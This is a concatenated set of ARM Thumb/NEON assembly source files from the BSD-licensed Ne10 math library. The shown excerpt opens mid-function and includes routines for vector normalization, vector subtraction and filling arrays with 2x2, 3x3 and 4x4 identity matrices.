vstr s10, [r0] @ Store the result back into the main memory
add r0, r0, #4 @ next entry in the dst
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4}
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_detmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_detmat.asm.s
@
|
open-vela/external_Ne10 | 6,714 | modules/math/NE10_normalize.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_normalize.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_normalize_vec2f_asm
.thumb
.thumb_func
ne10_normalize_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, unsigned int count)
@
@ Normalizes each 2-float vector: dst[i] = src[i] / |src[i]|.
@ The arrays are walked backwards, from the last entry to the first.
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec2F
add r0, r0, r2, lsl #3 @ r0 = r0 + count * 8; point one past the last dst entry
add r1, r1, r2, lsl #3 @ r1 = r1 + count * 8; point one past the last src entry
.LoopBeginVec2F:
vldmdb r1!, {s10-s11} @ load s10 = x and S11 = y (decrement-before addressing)
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vdiv.f32 s10, s10, s15 @ s10 = x / length
vdiv.f32 s11, s11, s15 @ s11 = y / length
vstmdb r0!, {s10-s11} @ store the results and move the pointer
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec2F @ loop while the counter (r2) is not zero
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_normalize_vec3f_asm
.thumb
.thumb_func
ne10_normalize_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, unsigned int count)
@
@ Normalizes each 3-float vector: dst[i] = src[i] / |src[i]|.
@ The arrays are walked backwards, from the last entry to the first.
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec3F
add r0, r0, r2, lsl #3 @ ...
add r0, r0, r2, lsl #2 @ r0 = r0 + count * 12 (8x + 4x); one past the last dst entry
add r1, r1, r2, lsl #3 @ ...
add r1, r1, r2, lsl #2 @ r1 = r1 + count * 12; one past the last src entry
.LoopBeginVec3F:
vldmdb r1!, {s10-s12} @ load s10 = x, s11 = y, s12 = z (decrement-before)
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vdiv.f32 s10, s10, s15 @ s10 = x / length
vdiv.f32 s11, s11, s15 @ s11 = y / length
vdiv.f32 s12, s12, s15 @ s12 = z / length
vstmdb r0!, {s10-s12} @ store the results and move the pointer
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec3F @ loop while the counter (r2) is not zero
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_normalize_vec4f_asm
.thumb
.thumb_func
ne10_normalize_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, unsigned int count)
@
@ Normalizes each 4-float vector: dst[i] = src[i] / |src[i]|.
@ The arrays are walked backwards, from the last entry to the first.
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec4F
add r0, r0, r2, lsl #4 @ r0 = r0 + count * 16; one past the last dst entry
add r1, r1, r2, lsl #4 @ r1 = r1 + count * 16; one past the last src entry
.LoopBeginVec4F:
vldmdb r1!, {s10-s13} @ load s10 = x, s11 = y, s12 = z, s13 = w (decrement-before)
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vmla.f32 s14, s13, s13 @ s14 = x*x + y*y + z*z + w*w
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vdiv.f32 s10, s10, s15 @ s10 = x / length
vdiv.f32 s11, s11, s15 @ s11 = y / length
vdiv.f32 s12, s12, s15 @ s12 = z / length
vdiv.f32 s13, s13, s15 @ s13 = w / length
vstmdb r0!, {s10-s13} @ store the results and move the pointer
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec4F @ loop while the counter (r2) is not zero
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 14,902 | modules/math/NE10_sub.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_sub.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_sub_float_neon
.thumb
.thumb_func
ne10_sub_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ dst[i] = src1[i] - src2[i] for i in [0, count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cbz r3, .L_check_float
@ load the 1st set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q3, q0, q1 @ q3 = q0 - q1
ble .L_mainloopend_float
.L_mainloop_float:
@ store the result for the current set
vst1.32 {d6,d7}, [r0]!
@ load the next set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q3, q0, q1 @ q3 = q0 - q1
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_mainloopend_float:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {d6,d7}, [r0]!
.L_check_float:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_float
.L_secondloop_float:
@ process the last few items left in the input array, one float at a time
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[0]
subs r4, r4, #1
@ calculate values
vsub.f32 d0, d0, d1
vst1.32 {d0[0]}, [r0]!
bgt .L_secondloop_float
.L_return_float:
@ return NE10_OK (0) in r0
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_sub_vec2f_neon
.thumb
.thumb_func
ne10_sub_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ dst[i] = src1[i] - src2[i], component-wise, for i in [0, count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cbz r3, .L_check_vec2
@ load the 1st set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q8, q0, q2
vsub.f32 q9, q1, q3
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ store the result for the current set
vst2.32 {d16,d17,d18,d19}, [r0]!
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q8, q0, q2
vsub.f32 q9, q1, q3
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ store the result for the last set
vst2.32 {d16,d17,d18,d19}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array, one vec2 at a time
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
@ calculate values
vsub.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return NE10_OK (0) in r0
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_sub_vec3f_neon
.thumb
.thumb_func
ne10_sub_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ dst[i] = src1[i] - src2[i], component-wise, for i in [0, count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec3
@ load the 1st set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q12, q0, q9
vsub.f32 q13, q1, q10
vsub.f32 q14, q2, q11
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ store the result for the current set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
@ load the next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q12, q0, q9
vsub.f32 q13, q1, q10
vsub.f32 q14, q2, q11
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ store the result for the last set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array, one vec3 at a time
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for x, y, and z
vsub.f32 d0, d0, d1
vsub.f32 d2, d2, d3
vsub.f32 d4, d4, d5
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return NE10_OK (0) in r0
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_sub_vec4f_neon
.thumb
.thumb_func
ne10_sub_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ dst[i] = src1[i] - src2[i], component-wise, for i in [0, count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec4
@ load the 1st set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q12, q0, q8
vsub.f32 q13, q1, q9
vsub.f32 q14, q2, q10
vsub.f32 q15, q3, q11
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ store the result for the current set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q12, q0, q8
vsub.f32 q13, q1, q9
vsub.f32 q14, q2, q10
vsub.f32 q15, q3, q11
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ store the result for the last set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array, one vec4 at a time
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
vsub.f32 q0, q0, q1
vst1.32 {d0, d1}, [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return NE10_OK (0) in r0
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,573 | modules/math/NE10_identitymat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_identitymat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_identitymat_2x2f_neon
.thumb
.thumb_func
ne10_identitymat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Fills an array of 2x2 matrices with the identity matrix.
@
@ arm_result_t ne10_identitymat_2x2f(arm_mat2x2f_t * dst,
@                 unsigned int count)
@
@  r0: *dst & current dst entry's address
@  r1: int count & the number of items in the input array that can be
@                   processed in chunks of 4 matrices
@
@  r2: the number of items that are left to be processed at the end
@                   of the input array
@
@ Returns NE10_OK (0) in r0.
@ NEON clobbers: q0-q3 only (caller-saved under AAPCS).
@
@ Fix vs. original: removed a leftover "vswp d18, d20" from the tail
@ loop — d18/d20 are never read or otherwise written in this function,
@ so the instruction was dead code.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r2, r1, #3 @ r2 = count % 4;
sub r1, r1, r2 @ count = count - r2; remainder handled after the main loop
@ Build the interleaved identity pattern:
@   q0 = q3 = {1,1,1,1}, q1 = q2 = {0,0,0,0}
@ so that vst4 of {d0,d2,d4,d6} emits 1,0,0,1 per lane — one
@ 2x2 identity matrix per lane.
vmov.f32 d2, #0.0
vmov.f32 d3, #0.0
vmov.f32 d0, #1.0
vmov.f32 d1, #1.0
vmov q3, q0
vmov q2, q1
cmp r1, #0
beq .L_check_mat2x2
.L_mainloop_mat2x2:
subs r1, r1, #4
@ each pair of vst4 stores writes 16 floats = 4 identity matrices
vst4.32 {d0, d2, d4, d6}, [r0]!
vst4.32 {d1, d3, d5, d7}, [r0]!
bgt .L_mainloop_mat2x2 @ loop while r1 > 0, i.e. at least another 4 matrices to write
.L_mainloopend_mat2x2:
.L_check_mat2x2:
@ check if anything is left to process at the end of the input array
cmp r2, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ write the last few matrices one at a time (lane 0 of each register = 1,0,0,1)
subs r2, r2, #1
vst4.32 {d0[0], d2[0], d4[0], d6[0]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return NE10_OK
mov r0, #0
bx lr
.align 2
.global ne10_identitymat_3x3f_neon
.thumb
.thumb_func
ne10_identitymat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Fills an array of 3x3 matrices with the identity matrix.
@
@ arm_result_t ne10_identitymat_3x3f(arm_mat3x3f_t * dst,
@                 unsigned int count)
@
@  r0: *dst & current dst entry's address
@  r1: int count & the number of items in the input array that can be
@                   processed in chunks of 4 matrices
@
@  r2: the number of items that are left to be processed at the end
@                   of the input array
@
@ Returns NE10_OK (0) in r0.
@ NEON clobbers: q0-q1, q8-q13 (all caller-saved under AAPCS).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r2, r1, #3 @ r2 = count % 4;
sub r1, r1, r2 @ count = count - r2; remainder handled after the main loop
@ Build {0,1} / {1,0} d-register patterns, then scatter them into
@ q8..q13 so that the vst3 stores below emit identity matrices.
vmov.f32 d2, #0.0
vmov.f32 d3, #0.0
vmov.f32 d0, #1.0
vmov.f32 d1, #1.0
vmov q8 , q1
vmov q9 , q1
vmov q10, q1
vmov q11, q1
vmov q12, q1
vmov q13, q1
vtrn.32 d2, d0 @ d0 = {0.0f, 1.0f}
vtrn.32 d1, d3 @ d1 = {1.0f, 0.0f}
vmov d16, d1
vmov d18, d0
vmov d21, d1
vmov d22, d1
vmov d24, d0
vmov d27, d1
cmp r1, #0
beq .L_check_mat3x3
.L_mainloop_mat3x3:
subs r1, r1, #2
@ each iteration writes 2 identity matrices (9 floats each, 18 floats total);
@ a full vst3 (6 floats) plus a lane-0 vst3 (3 floats) per matrix
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
vst3.32 { d22 , d24 , d26 }, [r0]!
vst3.32 { d23[0], d25[0], d27[0]}, [r0]!
bgt .L_mainloop_mat3x3 @ loop while r1 > 0, i.e. at least another 2 matrices to write
.L_mainloopend_mat3x3:
.L_check_mat3x3:
@ check if anything is left to process at the end of the input array
cmp r2, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ write the last few matrices one at a time
subs r2, r2, #1
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return NE10_OK
mov r0, #0
bx lr
.align 2
.global ne10_identitymat_4x4f_neon
.thumb
.thumb_func
ne10_identitymat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Fills an array of 4x4 matrices with the identity matrix.
@
@ arm_result_t ne10_identitymat_4x4f(arm_mat4x4f_t * dst,
@                 unsigned int count)
@
@  r0: *dst & current dst entry's address
@  r1: int count & the number of items in the input array that can be
@                   processed in chunks of 4 matrices
@
@  r2: the number of items that are left to be processed at the end
@                   of the input array
@
@ Returns NE10_OK (0) in r0.
@ NEON clobbers: q0-q1, q8-q15 (all caller-saved under AAPCS).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r2, r1, #3 @ r2 = count % 4;
sub r1, r1, r2 @ count = count - r2; remainder handled after the main loop
@ Build {0,1} / {1,0} d-register patterns, then scatter them into
@ q8..q15 so that the vst4 stores below emit identity matrices.
vmov.f32 d2, #0.0
vmov.f32 d3, #0.0
vmov.f32 d0, #1.0
vmov.f32 d1, #1.0
vmov q8 , q1
vmov q9 , q1
vmov q10, q1
vmov q11, q1
vmov q12, q1
vmov q13, q1
vmov q14, q1
vmov q15, q1
vtrn.32 d2, d0 @ d0 = {0.0f, 1.0f}
vtrn.32 d1, d3 @ d1 = {1.0f, 0.0f}
vmov d16, d1
vmov d18, d0
vmov d21, d1
vmov d23, d0
vmov d24, d1
vmov d26, d0
vmov d29, d1
vmov d31, d0
cmp r1, #0
beq .L_check_mat4x4
.L_mainloop_mat4x4:
subs r1, r1, #2
@ each iteration writes 2 identity matrices (16 floats each, 32 floats total)
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
vst4.32 { d24 , d26 , d28 , d30 }, [r0]!
vst4.32 { d25 , d27 , d29 , d31 }, [r0]!
bgt .L_mainloop_mat4x4 @ loop while r1 > 0, i.e. at least another 2 matrices to write
.L_mainloopend_mat4x4:
.L_check_mat4x4:
@ check if anything is left to process at the end of the input array
cmp r2, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ write the last few matrices one at a time
subs r2, r2, #1
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return NE10_OK
mov r0, #0
bx lr
|
